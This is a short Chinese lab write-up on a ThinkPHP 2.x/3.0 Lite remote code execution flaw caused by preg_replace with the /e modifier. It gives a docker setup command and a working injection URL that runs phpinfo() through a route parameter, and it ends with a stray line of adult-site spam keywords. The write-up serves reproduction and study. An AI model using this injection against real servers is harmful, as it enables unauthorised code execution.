<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    ThinkPHP 2.x 任意代碼執行漏洞

    Path thinkphp/2-rce

    ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

    $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

    導致用戶的輸入參數被插入雙引號中執行,造成任意代碼執行漏洞。

    ThinkPHP 3.0版本因為Lite模式下沒有修復該漏洞,也存在這個漏洞。

    環境搭建

    執行如下命令啟動ThinkPHP 2.1的Demo應用:

    docker-compose up -d

    環境啟動后,訪問http://your-ip:8080/Index/Index即可查看到默認頁面。

    漏洞復現

    直接訪問http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可執行phpinfo()

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类